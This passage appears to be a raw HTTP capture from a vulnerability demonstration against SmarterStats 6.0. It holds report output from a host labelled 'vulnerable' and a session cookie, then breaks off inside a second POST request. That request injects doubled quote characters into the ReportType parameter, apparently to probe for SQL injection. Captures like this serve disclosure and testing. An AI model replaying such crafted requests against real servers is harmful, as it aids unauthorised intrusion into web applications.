<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fphpMyAdmin%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>phpMyAdmin<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent5'></div>
40</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent5'></div>
40</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fphpMyAdmin%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>phpMyAdmin<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent4'></div>
32</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fmysql%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>mysql<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent3'></div>
24</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fpMA%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>pMA<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent3'></div>
24</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Other Items (954)</td>
<td class='FooterTotal ar rc percentcolrc'>3,898</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>4,571</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>4</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">5xx - Server Errors</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="ResultCodes_5xx"> <div class='ReportChart'><img src="/Temp/55606390fe3f46d1a3c53fb35e90f25b.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>File</th><th class='ar rc'>Hits</th></tr></thead>
<tbody>
<tr >
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
673</td>
</tr>
<tr class="alt">
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>Telerik.Web.UI.WebResource.axd</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
18</td>
</tr>
<tr >
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>webresource.axd</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
17</td>
</tr>
<tr class="alt">
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>favicon.ico</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>711</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>177</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Top File Types</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Top_FileTypes"> <div class='ReportChart'><img src="/Temp/93da743efbb443978311f033c93ef5f4.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Extension</th><th class='ar '>Hits</th><th class='ar '>Visits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>.axd</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
12,860</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
840</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
103</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>.aspx</td>

<td class='ar percentcol '>
<div class='percent percent3'></div>
1,533</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
131</td>
<td class='ar percentcol rc'>
<div class='percent percent18'></div>
75</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>.css</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
991</td>
<td class='ar percentcol '>
<div class='percent percent24'></div>
804</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>.bmp</td>

<td class='ar percentcol '>
<div class='percent percent1'></div>
755</td>
<td class='ar percentcol '>
<div class='percent percent15'></div>
492</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>.jpg</td>

<td class='ar percentcol '>
<div class='percent percent1'></div>
683</td>
<td class='ar percentcol '>
<div class='percent percent15'></div>
496</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
11</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>.ico</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
425</td>
<td class='ar percentcol '>
<div class='percent percent9'></div>
312</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>.txt</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
37</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
33</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>.pdf</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
12</td>
<td class='ar percentcol rc'>
<div class='percent percent1'></div>
6</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>.htm</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>.xml</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
6</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (1)</td>
<td class='FooterTotal ar percentcol'>5</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>0</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>17,319</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>201</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>1,574</td>
<td class='FooterAverages ar percentcol'>&nbsp;</td>
<td class='FooterAverages ar rc percentcolrc'>18</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Entry Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Path_EntryPages"> <div class='ReportChart'><img src="/Temp/2e5752f4fb284948b23574feda04dc4f.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
722</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
21</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcrossdomain.xml','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>crossdomain.xml</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fimages%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>images<wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fapptesting.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>apptesting.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>754</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>83</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5468|hiddenField|__VIEWSTATE|/wEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhwCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o+jgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwkGAABowSlcoQkeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8MBQxTbWFydGVyVG9vbHMfCmgfCAYAQMr4o+jgBx8GBRMyMDEwLTEwLTAzLTAwLTAwLTAwZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA+AxcNc0IHwgGAEDK+KPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR8QBQdyaUxhYmVsHxFoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMDktMDAtMDAtMDBkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkAiMPZBYCZg9kFgQCAQ8PFgIfBmRkZAIDDw8WAh8GZGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFy2i6SqU9sX2UGCANrrGpuPaZ9vy6xkf2p8L7PZhOpOzc=|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|73|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard%27&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

Request 2

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard''&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhoCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o%2BjgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwYFEzIwMTAtMTAtMDMtMDAtMDAtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8KaB8IBgBAyvij6OAHZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGF